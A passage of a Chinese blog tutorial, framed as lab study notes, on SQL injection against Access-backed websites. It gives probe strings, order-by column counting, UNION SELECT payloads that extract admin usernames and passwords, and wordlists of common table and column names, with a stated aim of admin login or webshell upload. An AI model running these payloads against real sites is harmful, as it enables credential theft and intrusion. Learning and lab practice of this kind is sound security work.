【hack靶场学习】——access数据库注入

1、SQL注入之Access数据库

SQL注入是非常常见的一个漏洞,如果程序员在编写网站源码时未对SQL执行语句作防护措施,那么用户输入就可以执行SQL语句,导致用户数据被删改、拖库、挂马等。而它的种类也根据参数类型、提交方式、注入方式以及数据库类型的不同来进行区分。Access数据库一种小型数据库用于储存数据,其中各个对象之间可以建立关联,方便用户快速查询与调用数据。它相对其他数据库来说比较简单,只有一个数据库,里面存放着表、列以及数据,通过简单的语句就可以完成注入。一般通过联合注入、逐字猜解、偏移注入等方式进行攻击,在面对搭载这类数据库的网站时,也可以针对.mdb和.asp后缀名的文件进行爆破,说不定存在信息泄露可以直接拿到数据库。本文主要针对Access数据库的注入的原理以及攻击方式进行归纳。

2、整体思路

1、通过报错或常见组合判断数据库类型(MySQL+PHP、MSSQL+ASPX、Oracle+JSP...)
2、截取请求包更换请求方式(POST、GET...)或更改请求包参数(Cookie、Referer、User-Agent...)寻找注入点
3、通过单引号、百分号来判断注入参数类型(数字型、字符型、搜索型...)
4、选择攻击注入方式(联合注入、逐字猜解、偏移注入...)
5、判断是否能猜解到表名、列名,主要分为以下三种情况:
- 如果能猜解到表名和列名,那么可以使用联合注入或逐字猜解
- 如果只能猜解到表名,无法猜解到列名,那么可以使用偏移注入
- 如果无法猜解到表名或列名,那么可以查看网站源代码、提交的参数来构造表名
6、获取数据库中的敏感数据登录后台或直接写入webshell

3、攻击思路

一、联合注入

1、判断注入点,一般来说单引号、减号、and等就可以判断是否存在注入

?id=3'  #返回页面与id=3不同,说明存在注入
?id=3-1 #返回一个与id=3不同的正常界面,说明已经代入数据库执行,存在注入
?id=3 and 1=2 #返回页面与and 1=1不同,说明已经完成了真假判断,存在注入

2、通过order by 判断字段数,将字段数从小到大以此类推,直至返回错误页面,而正确的字段数就是返回错误的字段数减一

?id=3 order by 1
...
?id=3 order by 10 #返回错误页面,字段数为9

3、通过联合查询

select * from article where id= -1 union select 1,[column_name],3 from [table_name]

如:-1 union select 1,username,password,4,5,6,7,8,9,10 from admin

那么在实际场景中,只需要先找到注入点,通过order by进行字段判断,再使用可控输入对目标数据库进行联合注入即可,本质上和MySQL的联合注入差不多,不过它没有information_schema库,需要猜解它的表名和列名,如果猜对了就会在网页上回显账号密码。可以将以下常用的表名和列名进行猜解。
常见的表名:

admin,a_admin,x_admin,m_admin,adminuser,admin_user,article_admin,administrator,manage,manager,member,memberlist,user,users,Manage_User,user_info,admin_userinfo,UserGroups,user_list,login,用户,Friend,zl,movie,news,password,clubconfig,config,company,book,art,dv_admin,userinfo

常见的列名:

username,adminusername,admin_username,adminname,admin_name,admin,adminuser,admin_user,usrname,usr_name,user_admin,password,admin_password,administrator,administrators,adminpassword,adminpwd,admin_pwd,adminpass,admin_pass,usrpass,usr_pass,user,name,pass,userpass,user_pass,userpassword,user_password,pwd,userpwd,user_pwd,useradmin,pword,p_word,pass-wd,yonghu,用户,用户名,密码,帐号,id,uid,userid,user_id,adminid,admin_id,login_name

4、靶场实战

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值